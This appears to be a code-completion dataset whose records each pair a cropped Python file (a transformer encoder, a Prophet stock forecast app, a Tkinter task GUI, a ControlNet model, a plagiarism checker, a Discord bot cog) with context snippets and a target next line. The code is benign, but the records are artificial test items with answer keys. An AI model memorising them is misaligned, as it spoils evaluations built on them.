errors: dict[str, str] = {}
if user_input is not None:
if len(self.configured_sources) > 0:
user_input[CONF_SOURCES] = self.configured_sources
elif self.hass.config.country is not None:
user_input[CONF_SOURCES] = COUNTRY_MAP.get(self.hass.config.country)
else:
user_input[CONF_SOURCES] = list(SOURCE_MAP) | user_input[CONF_AREAS] = self.configured_areas | 2 | 2023-12-19 20:54:21+00:00 | 4k |
thuiar/TCL-MAP | methods/TCL_MAP/SubNets/transformers_encoder/transformer.py | [
{
"identifier": "SinusoidalPositionalEmbedding",
"path": "methods/TCL_MAP/SubNets/transformers_encoder/position_embedding.py",
"snippet": "class SinusoidalPositionalEmbedding(nn.Module):\n \"\"\"This module produces sinusoidal positional embeddings of any length.\n Padding symbols are ignored, but... | import torch
import torch.nn.functional as F
import math
from torch import nn
from .position_embedding import SinusoidalPositionalEmbedding
from .multihead_attention import MultiheadAttention | 3,461 |
class TransformerEncoder(nn.Module):
"""
Transformer encoder consisting of *args.encoder_layers* layers. Each layer
is a :class:`TransformerEncoderLayer`.
Args:
embed_tokens (torch.nn.Embedding): input embedding
num_heads (int): number of heads
layers (int): number of layers
attn_dropout (float): dropout applied on the attention weights
relu_dropout (float): dropout applied on the first layer of the residual block
res_dropout (float): dropout applied on the residual block
attn_mask (bool): whether to apply mask on the attention weights
"""
def __init__(self, embed_dim, num_heads, layers, attn_dropout=0.0, relu_dropout=0.0, res_dropout=0.0,
embed_dropout=0.0, attn_mask=False):
super().__init__()
self.dropout = embed_dropout # Embedding dropout
self.attn_dropout = attn_dropout
self.embed_dim = embed_dim
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(embed_dim)
self.attn_mask = attn_mask
self.layers = nn.ModuleList([])
for layer in range(layers):
new_layer = TransformerEncoderLayer(embed_dim,
num_heads=num_heads,
attn_dropout=attn_dropout,
relu_dropout=relu_dropout,
res_dropout=res_dropout,
attn_mask=attn_mask)
self.layers.append(new_layer)
self.register_buffer('version', torch.Tensor([2]))
self.normalize = True
if self.normalize:
self.layer_norm = LayerNorm(embed_dim)
def forward(self, x_in, x_in_k = None, x_in_v = None):
"""
Args:
x_in (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_k (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_v (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
Returns:
dict:
- **encoder_out** (Tensor): the last encoder layer's output of
shape `(src_len, batch, embed_dim)`
- **encoder_padding_mask** (ByteTensor): the positions of
padding elements of shape `(batch, src_len)`
"""
# embed tokens and positions
x = self.embed_scale * x_in
if self.embed_positions is not None:
x += self.embed_positions(x_in.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x = F.dropout(x, p=self.dropout, training=self.training)
if x_in_k is not None and x_in_v is not None:
# embed tokens and positions
x_k = self.embed_scale * x_in_k
x_v = self.embed_scale * x_in_v
if self.embed_positions is not None:
x_k += self.embed_positions(x_in_k.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_v += self.embed_positions(x_in_v.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_k = F.dropout(x_k, p=self.dropout, training=self.training)
x_v = F.dropout(x_v, p=self.dropout, training=self.training)
# encoder layers
intermediates = [x]
for layer in self.layers:
if x_in_k is not None and x_in_v is not None:
x = layer(x, x_k, x_v)
else:
x = layer(x)
intermediates.append(x)
if self.normalize:
x = self.layer_norm(x)
return x
def max_positions(self):
"""Maximum input length supported by the encoder."""
if self.embed_positions is None:
return self.max_source_positions
return min(self.max_source_positions, self.embed_positions.max_positions())
class TransformerEncoderLayer(nn.Module):
"""Encoder layer block.
In the original paper each operation (multi-head attention or FFN) is
postprocessed with: `dropout -> add residual -> layernorm`. In the
tensor2tensor code they suggest that learning is more robust when
preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.encoder_normalize_before* to ``True``.
Args:
embed_dim: Embedding dimension
"""
def __init__(self, embed_dim, num_heads=4, attn_dropout=0.1, relu_dropout=0.1, res_dropout=0.1,
attn_mask=False):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
|
class TransformerEncoder(nn.Module):
"""
Transformer encoder consisting of *args.encoder_layers* layers. Each layer
is a :class:`TransformerEncoderLayer`.
Args:
embed_tokens (torch.nn.Embedding): input embedding
num_heads (int): number of heads
layers (int): number of layers
attn_dropout (float): dropout applied on the attention weights
relu_dropout (float): dropout applied on the first layer of the residual block
res_dropout (float): dropout applied on the residual block
attn_mask (bool): whether to apply mask on the attention weights
"""
def __init__(self, embed_dim, num_heads, layers, attn_dropout=0.0, relu_dropout=0.0, res_dropout=0.0,
embed_dropout=0.0, attn_mask=False):
super().__init__()
self.dropout = embed_dropout # Embedding dropout
self.attn_dropout = attn_dropout
self.embed_dim = embed_dim
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(embed_dim)
self.attn_mask = attn_mask
self.layers = nn.ModuleList([])
for layer in range(layers):
new_layer = TransformerEncoderLayer(embed_dim,
num_heads=num_heads,
attn_dropout=attn_dropout,
relu_dropout=relu_dropout,
res_dropout=res_dropout,
attn_mask=attn_mask)
self.layers.append(new_layer)
self.register_buffer('version', torch.Tensor([2]))
self.normalize = True
if self.normalize:
self.layer_norm = LayerNorm(embed_dim)
def forward(self, x_in, x_in_k = None, x_in_v = None):
"""
Args:
x_in (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_k (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_v (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
Returns:
dict:
- **encoder_out** (Tensor): the last encoder layer's output of
shape `(src_len, batch, embed_dim)`
- **encoder_padding_mask** (ByteTensor): the positions of
padding elements of shape `(batch, src_len)`
"""
# embed tokens and positions
x = self.embed_scale * x_in
if self.embed_positions is not None:
x += self.embed_positions(x_in.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x = F.dropout(x, p=self.dropout, training=self.training)
if x_in_k is not None and x_in_v is not None:
# embed tokens and positions
x_k = self.embed_scale * x_in_k
x_v = self.embed_scale * x_in_v
if self.embed_positions is not None:
x_k += self.embed_positions(x_in_k.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_v += self.embed_positions(x_in_v.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_k = F.dropout(x_k, p=self.dropout, training=self.training)
x_v = F.dropout(x_v, p=self.dropout, training=self.training)
# encoder layers
intermediates = [x]
for layer in self.layers:
if x_in_k is not None and x_in_v is not None:
x = layer(x, x_k, x_v)
else:
x = layer(x)
intermediates.append(x)
if self.normalize:
x = self.layer_norm(x)
return x
def max_positions(self):
"""Maximum input length supported by the encoder."""
if self.embed_positions is None:
return self.max_source_positions
return min(self.max_source_positions, self.embed_positions.max_positions())
class TransformerEncoderLayer(nn.Module):
"""Encoder layer block.
In the original paper each operation (multi-head attention or FFN) is
postprocessed with: `dropout -> add residual -> layernorm`. In the
tensor2tensor code they suggest that learning is more robust when
preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.encoder_normalize_before* to ``True``.
Args:
embed_dim: Embedding dimension
"""
def __init__(self, embed_dim, num_heads=4, attn_dropout=0.1, relu_dropout=0.1, res_dropout=0.1,
attn_mask=False):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
| self.self_attn = MultiheadAttention( | 1 | 2023-12-20 03:12:38+00:00 | 4k |
abdellatif-laghjaj/stock-market-prediction | main.py | [
{
"identifier": "load_data",
"path": "services.py",
"snippet": "@st.cache_data\ndef load_data(ticker, start, end):\n \"\"\"\n Load historical stock price data from Yahoo Finance.\n\n Parameters:\n - ticker (str): Stock symbol (e.g., AAPL).\n - start (str): Start date in the format 'YYYY-M... | from time import sleep
from sklearn.metrics import mean_absolute_error
from streamlit_option_menu import option_menu
from datetime import date
from prophet import Prophet
from prophet.plot import plot_plotly
from services import load_data, plot_data, plot_multiple_data, plot_volume
import uuid
import pandas as pd
import streamlit as st | 1,721 |
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."):
data = load_data(selected_stock, start_date, end_date)
sleep(1)
# Display the success message
success_message = st.success("Data loaded successfully!")
# Introduce a delay before clearing the success message
sleep(1)
# Clear the success message
success_message.empty()
# Forecasting
df_train = data[["Date", "Close"]]
df_train = df_train.rename(columns={"Date": "ds", "Close": "y"})
model = Prophet()
model.fit(df_train)
future = model.make_future_dataframe(periods=period)
forecast = model.predict(future)
# Convert end_date to datetime
end_date_datetime = pd.to_datetime(end_date)
# Filter forecast based on end_date
forecast = forecast[forecast['ds'] >= end_date_datetime]
# Dataframes Tab
if selected_tab == "Dataframes":
# Display historical data
st.markdown("<h2><span style='color: orange;'>{}</span> Historical Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays historical stock price data for {} from {} to {}.".format(selected_stock, start_date, end_date))
# Copy data
new_data = data.copy()
# Drop Adj Close and Volume columns
new_data = data.drop(columns=['Adj Close', 'Volume'])
st.dataframe(new_data, use_container_width=True)
# Display forecast data
st.markdown("<h2><span style='color: orange;'>{}</span> Forecast Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays the forecasted stock price data for {} using the Prophet model from {} to {}.".format(selected_stock, end_date, end_date + pd.Timedelta(days=period)))
# Copy forecast dataframe
new_forecast = forecast.copy()
# Drop unwanted columns
new_forecast = new_forecast.drop(columns=[
'additive_terms',
'additive_terms_lower',
'additive_terms_upper',
'weekly',
'weekly_lower',
'weekly_upper',
'yearly',
'yearly_lower',
'yearly_upper',
'multiplicative_terms',
'multiplicative_terms_lower',
'multiplicative_terms_upper'
])
# Rename columns
new_forecast = new_forecast.rename(columns={
"ds": "Date",
"yhat": "Close",
"yhat_lower": "Close Lower",
"yhat_upper": "Close Upper",
"trend": "Trend",
"trend_lower": "Trend Lower",
"trend_upper": "Trend Upper"
})
st.dataframe(new_forecast, use_container_width=True)
# Plots Tab
if selected_tab == "Plots":
# Raw data plot
plot_data(data)
# Data Volume plot
|
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."):
data = load_data(selected_stock, start_date, end_date)
sleep(1)
# Display the success message
success_message = st.success("Data loaded successfully!")
# Introduce a delay before clearing the success message
sleep(1)
# Clear the success message
success_message.empty()
# Forecasting
df_train = data[["Date", "Close"]]
df_train = df_train.rename(columns={"Date": "ds", "Close": "y"})
model = Prophet()
model.fit(df_train)
future = model.make_future_dataframe(periods=period)
forecast = model.predict(future)
# Convert end_date to datetime
end_date_datetime = pd.to_datetime(end_date)
# Filter forecast based on end_date
forecast = forecast[forecast['ds'] >= end_date_datetime]
# Dataframes Tab
if selected_tab == "Dataframes":
# Display historical data
st.markdown("<h2><span style='color: orange;'>{}</span> Historical Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays historical stock price data for {} from {} to {}.".format(selected_stock, start_date, end_date))
# Copy data
new_data = data.copy()
# Drop Adj Close and Volume columns
new_data = data.drop(columns=['Adj Close', 'Volume'])
st.dataframe(new_data, use_container_width=True)
# Display forecast data
st.markdown("<h2><span style='color: orange;'>{}</span> Forecast Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays the forecasted stock price data for {} using the Prophet model from {} to {}.".format(selected_stock, end_date, end_date + pd.Timedelta(days=period)))
# Copy forecast dataframe
new_forecast = forecast.copy()
# Drop unwanted columns
new_forecast = new_forecast.drop(columns=[
'additive_terms',
'additive_terms_lower',
'additive_terms_upper',
'weekly',
'weekly_lower',
'weekly_upper',
'yearly',
'yearly_lower',
'yearly_upper',
'multiplicative_terms',
'multiplicative_terms_lower',
'multiplicative_terms_upper'
])
# Rename columns
new_forecast = new_forecast.rename(columns={
"ds": "Date",
"yhat": "Close",
"yhat_lower": "Close Lower",
"yhat_upper": "Close Upper",
"trend": "Trend",
"trend_lower": "Trend Lower",
"trend_upper": "Trend Upper"
})
st.dataframe(new_forecast, use_container_width=True)
# Plots Tab
if selected_tab == "Plots":
# Raw data plot
plot_data(data)
# Data Volume plot | plot_volume(data) | 3 | 2023-12-17 11:38:48+00:00 | 4k |
CoolPointerException/Amigo | gui/tab_task.py | [
{
"identifier": "Properties",
"path": "gui/input_validator.py",
"snippet": "class Properties(Enum):\n PROJECT_NAME = 1\n SELECTED_DIRECTORY = 2\n API_TYPE = 3\n API_BASE = 4\n API_VERSION = 5\n API_KEY = 6\n GPT_MODEL = 7\n GPT_DEPLOYMENT = 8\n EMBEDDING_MODEL = 9\n EMBEDDI... | import os
import sys
import tempfile
import threading
import tkinter as tk
from tkinter import ttk, scrolledtext, messagebox
from llama_index.llms import ChatMessage
from gui.input_validator import Properties, validate
from gui.llama_index_init import init_llama_index
from helpers.question import question
from tkinterweb import HtmlFrame | 2,939 |
class TaskTab:
def __init__(self, root, frame):
self.frame = frame
self.root = root
# Task Requirements
ttk.Label(frame, text="Task Requirements:", style='W.Label').pack(fill=tk.X, padx=10, pady=(12, 2))
self.task_requirements_entry = scrolledtext.ScrolledText(frame, wrap=tk.WORD, height=7)
self.task_requirements_entry.configure(state='normal')
self.task_requirements_entry.pack(fill=tk.X, padx=10, pady=10)
# Select project
ttk.Label(frame, text="Selected Project:", style='W.Label').pack(fill=tk.X, padx=10, pady=2)
self.selected_project = ttk.Combobox(frame)
self.selected_project.pack(fill=tk.X, padx=10, pady=10)
# Run Generation Button
self.run_generation_button = ttk.Button(frame, text="Generate", command=self.generate_answer)
self.run_generation_button.pack(padx=10, pady=10)
# Clear chat Button
self.run_generation_button = ttk.Button(frame, text="Clear chat", command=self.clear_chat)
self.run_generation_button.pack(padx=10, pady=10)
# Generation Response Field
self.generation_response_frame = ttk.Frame(self.frame)
self.generation_response = HtmlFrame(self.generation_response_frame)
# Loading screen
self.loading_frame = ttk.Frame(self.frame)
self.loader = HtmlFrame(self.loading_frame)
self.load_loading_page()
def clear_chat(self):
self.root.messages = []
self.load_web_page()
def generate_answer(self):
|
class TaskTab:
def __init__(self, root, frame):
self.frame = frame
self.root = root
# Task Requirements
ttk.Label(frame, text="Task Requirements:", style='W.Label').pack(fill=tk.X, padx=10, pady=(12, 2))
self.task_requirements_entry = scrolledtext.ScrolledText(frame, wrap=tk.WORD, height=7)
self.task_requirements_entry.configure(state='normal')
self.task_requirements_entry.pack(fill=tk.X, padx=10, pady=10)
# Select project
ttk.Label(frame, text="Selected Project:", style='W.Label').pack(fill=tk.X, padx=10, pady=2)
self.selected_project = ttk.Combobox(frame)
self.selected_project.pack(fill=tk.X, padx=10, pady=10)
# Run Generation Button
self.run_generation_button = ttk.Button(frame, text="Generate", command=self.generate_answer)
self.run_generation_button.pack(padx=10, pady=10)
# Clear chat Button
self.run_generation_button = ttk.Button(frame, text="Clear chat", command=self.clear_chat)
self.run_generation_button.pack(padx=10, pady=10)
# Generation Response Field
self.generation_response_frame = ttk.Frame(self.frame)
self.generation_response = HtmlFrame(self.generation_response_frame)
# Loading screen
self.loading_frame = ttk.Frame(self.frame)
self.loader = HtmlFrame(self.loading_frame)
self.load_loading_page()
def clear_chat(self):
self.root.messages = []
self.load_web_page()
def generate_answer(self): | is_valid = validate(self.root, [ | 1 | 2023-12-15 14:06:38+00:00 | 4k |
quocanh34/magic-animate-modified | magicanimate/models/controlnet.py | [
{
"identifier": "TimestepEmbedding",
"path": "magicanimate/models/embeddings.py",
"snippet": "class TimestepEmbedding(nn.Module):\n def __init__(\n self,\n in_channels: int,\n time_embed_dim: int,\n act_fn: str = \"silu\",\n out_dim: int = None,\n post_act_fn... | from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple, Union
from torch import nn
from torch.nn import functional as F
from diffusers.configuration_utils import ConfigMixin, register_to_config
from diffusers.utils import BaseOutput, logging
from .embeddings import TimestepEmbedding, Timesteps
from diffusers.models.modeling_utils import ModelMixin
from diffusers.models.unet_2d_blocks import (
CrossAttnDownBlock2D,
DownBlock2D,
UNetMidBlock2DCrossAttn,
get_down_block,
)
from diffusers.models.unet_2d_condition import UNet2DConditionModel
import torch | 2,195 |
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
@dataclass
class ControlNetOutput(BaseOutput):
down_block_res_samples: Tuple[torch.Tensor]
mid_block_res_sample: torch.Tensor
class ControlNetConditioningEmbedding(nn.Module):
"""
Quoting from https://arxiv.org/abs/2302.05543: "Stable Diffusion uses a pre-processing method similar to VQ-GAN
[11] to convert the entire dataset of 512 × 512 images into smaller 64 × 64 “latent images” for stabilized
training. This requires ControlNets to convert image-based conditions to 64 × 64 feature space to match the
convolution size. We use a tiny network E(·) of four convolution layers with 4 × 4 kernels and 2 × 2 strides
(activated by ReLU, channels are 16, 32, 64, 128, initialized with Gaussian weights, trained jointly with the full
model) to encode image-space conditions ... into feature maps ..."
"""
def __init__(
self,
conditioning_embedding_channels: int,
conditioning_channels: int = 3,
block_out_channels: Tuple[int] = (16, 32, 96, 256),
):
super().__init__()
self.conv_in = nn.Conv2d(conditioning_channels, block_out_channels[0], kernel_size=3, padding=1)
self.blocks = nn.ModuleList([])
for i in range(len(block_out_channels) - 1):
channel_in = block_out_channels[i]
channel_out = block_out_channels[i + 1]
self.blocks.append(nn.Conv2d(channel_in, channel_in, kernel_size=3, padding=1))
self.blocks.append(nn.Conv2d(channel_in, channel_out, kernel_size=3, padding=1, stride=2))
self.conv_out = zero_module(
nn.Conv2d(block_out_channels[-1], conditioning_embedding_channels, kernel_size=3, padding=1)
)
def forward(self, conditioning):
embedding = self.conv_in(conditioning)
embedding = F.silu(embedding)
for block in self.blocks:
embedding = block(embedding)
embedding = F.silu(embedding)
embedding = self.conv_out(embedding)
return embedding
class ControlNetModel(ModelMixin, ConfigMixin):
_supports_gradient_checkpointing = True
@register_to_config
def __init__(
self,
in_channels: int = 4,
flip_sin_to_cos: bool = True,
freq_shift: int = 0,
down_block_types: Tuple[str] = (
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"DownBlock2D",
),
only_cross_attention: Union[bool, Tuple[bool]] = False,
block_out_channels: Tuple[int] = (320, 640, 1280, 1280),
layers_per_block: int = 2,
downsample_padding: int = 1,
mid_block_scale_factor: float = 1,
act_fn: str = "silu",
norm_num_groups: Optional[int] = 32,
norm_eps: float = 1e-5,
cross_attention_dim: int = 1280,
attention_head_dim: Union[int, Tuple[int]] = 8,
use_linear_projection: bool = False,
class_embed_type: Optional[str] = None,
num_class_embeds: Optional[int] = None,
upcast_attention: bool = False,
resnet_time_scale_shift: str = "default",
projection_class_embeddings_input_dim: Optional[int] = None,
controlnet_conditioning_channel_order: str = "rgb",
conditioning_embedding_out_channels: Optional[Tuple[int]] = (16, 32, 96, 256),
):
super().__init__()
# Check inputs
if len(block_out_channels) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `block_out_channels` as `down_block_types`. `block_out_channels`: {block_out_channels}. `down_block_types`: {down_block_types}."
)
if not isinstance(only_cross_attention, bool) and len(only_cross_attention) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `only_cross_attention` as `down_block_types`. `only_cross_attention`: {only_cross_attention}. `down_block_types`: {down_block_types}."
)
if not isinstance(attention_head_dim, int) and len(attention_head_dim) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `attention_head_dim` as `down_block_types`. `attention_head_dim`: {attention_head_dim}. `down_block_types`: {down_block_types}."
)
# input
conv_in_kernel = 3
conv_in_padding = (conv_in_kernel - 1) // 2
self.conv_in = nn.Conv2d(
in_channels, block_out_channels[0], kernel_size=conv_in_kernel, padding=conv_in_padding
)
# time
time_embed_dim = block_out_channels[0] * 4
self.time_proj = Timesteps(block_out_channels[0], flip_sin_to_cos, freq_shift)
timestep_input_dim = block_out_channels[0]
| # *************************************************************************
# This file may have been modified by Bytedance Inc. (“Bytedance Inc.'s Mo-
# difications”). All Bytedance Inc.'s Modifications are Copyright (2023) B-
# ytedance Inc..
# *************************************************************************
# Copyright 2023 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
@dataclass
class ControlNetOutput(BaseOutput):
down_block_res_samples: Tuple[torch.Tensor]
mid_block_res_sample: torch.Tensor
class ControlNetConditioningEmbedding(nn.Module):
"""
Quoting from https://arxiv.org/abs/2302.05543: "Stable Diffusion uses a pre-processing method similar to VQ-GAN
[11] to convert the entire dataset of 512 × 512 images into smaller 64 × 64 “latent images” for stabilized
training. This requires ControlNets to convert image-based conditions to 64 × 64 feature space to match the
convolution size. We use a tiny network E(·) of four convolution layers with 4 × 4 kernels and 2 × 2 strides
(activated by ReLU, channels are 16, 32, 64, 128, initialized with Gaussian weights, trained jointly with the full
model) to encode image-space conditions ... into feature maps ..."
"""
def __init__(
self,
conditioning_embedding_channels: int,
conditioning_channels: int = 3,
block_out_channels: Tuple[int] = (16, 32, 96, 256),
):
super().__init__()
self.conv_in = nn.Conv2d(conditioning_channels, block_out_channels[0], kernel_size=3, padding=1)
self.blocks = nn.ModuleList([])
for i in range(len(block_out_channels) - 1):
channel_in = block_out_channels[i]
channel_out = block_out_channels[i + 1]
self.blocks.append(nn.Conv2d(channel_in, channel_in, kernel_size=3, padding=1))
self.blocks.append(nn.Conv2d(channel_in, channel_out, kernel_size=3, padding=1, stride=2))
self.conv_out = zero_module(
nn.Conv2d(block_out_channels[-1], conditioning_embedding_channels, kernel_size=3, padding=1)
)
def forward(self, conditioning):
embedding = self.conv_in(conditioning)
embedding = F.silu(embedding)
for block in self.blocks:
embedding = block(embedding)
embedding = F.silu(embedding)
embedding = self.conv_out(embedding)
return embedding
class ControlNetModel(ModelMixin, ConfigMixin):
_supports_gradient_checkpointing = True
@register_to_config
def __init__(
self,
in_channels: int = 4,
flip_sin_to_cos: bool = True,
freq_shift: int = 0,
down_block_types: Tuple[str] = (
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"DownBlock2D",
),
only_cross_attention: Union[bool, Tuple[bool]] = False,
block_out_channels: Tuple[int] = (320, 640, 1280, 1280),
layers_per_block: int = 2,
downsample_padding: int = 1,
mid_block_scale_factor: float = 1,
act_fn: str = "silu",
norm_num_groups: Optional[int] = 32,
norm_eps: float = 1e-5,
cross_attention_dim: int = 1280,
attention_head_dim: Union[int, Tuple[int]] = 8,
use_linear_projection: bool = False,
class_embed_type: Optional[str] = None,
num_class_embeds: Optional[int] = None,
upcast_attention: bool = False,
resnet_time_scale_shift: str = "default",
projection_class_embeddings_input_dim: Optional[int] = None,
controlnet_conditioning_channel_order: str = "rgb",
conditioning_embedding_out_channels: Optional[Tuple[int]] = (16, 32, 96, 256),
):
super().__init__()
# Check inputs
if len(block_out_channels) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `block_out_channels` as `down_block_types`. `block_out_channels`: {block_out_channels}. `down_block_types`: {down_block_types}."
)
if not isinstance(only_cross_attention, bool) and len(only_cross_attention) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `only_cross_attention` as `down_block_types`. `only_cross_attention`: {only_cross_attention}. `down_block_types`: {down_block_types}."
)
if not isinstance(attention_head_dim, int) and len(attention_head_dim) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `attention_head_dim` as `down_block_types`. `attention_head_dim`: {attention_head_dim}. `down_block_types`: {down_block_types}."
)
# input
conv_in_kernel = 3
conv_in_padding = (conv_in_kernel - 1) // 2
self.conv_in = nn.Conv2d(
in_channels, block_out_channels[0], kernel_size=conv_in_kernel, padding=conv_in_padding
)
# time
time_embed_dim = block_out_channels[0] * 4
self.time_proj = Timesteps(block_out_channels[0], flip_sin_to_cos, freq_shift)
timestep_input_dim = block_out_channels[0]
| self.time_embedding = TimestepEmbedding( | 0 | 2023-12-15 01:22:37+00:00 | 4k |
KR1470R/plagiator-py | main.py | [
{
"identifier": "exists",
"path": "utils/exists.py",
"snippet": "def exists(obj, *keys):\n format_keys = \"\".join(\n list(map(\n lambda key: f\"['{key}']\",\n keys\n ))\n )\n try:\n return eval(f\"obj{format_keys}\")\n except Exception:\n return None"
},
{
"identifier"... | import sys
import json
import dotenv
import logging
import concurrent.futures
from time import sleep
from random import randint
from utils.exists import exists
from os import getenv, path, curdir, mkdir
from utils.plagiator import Plagiator
from utils.split_chunks import split_chunks
from utils.document_parser import DocumentParser | 1,978 |
dotenv.load_dotenv(path.abspath(path.join(
curdir, "configs", ".env"
)))
logging.basicConfig(level=logging.INFO)
try:
docpath_arg = sys.argv[1]
except Exception:
docpath_arg = None
document_path = docpath_arg or getenv("DOC_PATH") or input(
"""
Enter absolute path to your document
Supported formats:
- .doc
- .docx
- .pdf
- .txt
-> """
)
words_per_chunk = int(getenv("WORDS_PER_CHUNK") or 100)
result_target_filename = path.basename(document_path).split(".")[0] + ".json"
result_folder = path.join(curdir, "results")
|
dotenv.load_dotenv(path.abspath(path.join(
curdir, "configs", ".env"
)))
logging.basicConfig(level=logging.INFO)
try:
docpath_arg = sys.argv[1]
except Exception:
docpath_arg = None
document_path = docpath_arg or getenv("DOC_PATH") or input(
"""
Enter absolute path to your document
Supported formats:
- .doc
- .docx
- .pdf
- .txt
-> """
)
words_per_chunk = int(getenv("WORDS_PER_CHUNK") or 100)
result_target_filename = path.basename(document_path).split(".")[0] + ".json"
result_folder = path.join(curdir, "results") | if not path.exists(result_folder): | 0 | 2023-12-21 17:29:18+00:00 | 4k |
fmhy/bot | cogs/events.py | [
{
"identifier": "channel_ids",
"path": "cogs/_config.py",
"snippet": "TOKEN = os.getenv(\"TOKEN\", None)\nGUILD_ID = os.getenv(\"GUILD_ID\", None)\nOWNERS = os.getenv(\"OWNERS\").split(\",\")\nRSS_CHANNELS = os.getenv(\"RSS_CHANNEL_IDS\", None)\nFEEDS = os.getenv(\"RSS_FEED_URLS\", None)\nDB = os.getenv... | import re
import time
import discord
from datetime import datetime
from discord.ext import commands, tasks
from cogs._config import channel_ids, managing_roles, url_regex, auto_thread_channels, auto_thread_roles
from cogs._helpers import cembed
from main import Bot | 1,861 |
return duplicate_links, non_duplicate_links
@commands.Cog.listener()
async def on_ready(self):
self.update_single_page.start()
dead_sites_channel = self.bot.get_channel(988133247575810059)
if dead_sites_channel:
self.dead_sites_messages = set(await dead_sites_channel.history(limit=None).flatten())
deleted_sites_channel = self.bot.get_channel(986617857133649921)
if deleted_sites_channel:
self.deleted_sites_messages = set(
await deleted_sites_channel.history(limit=None).flatten()
)
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
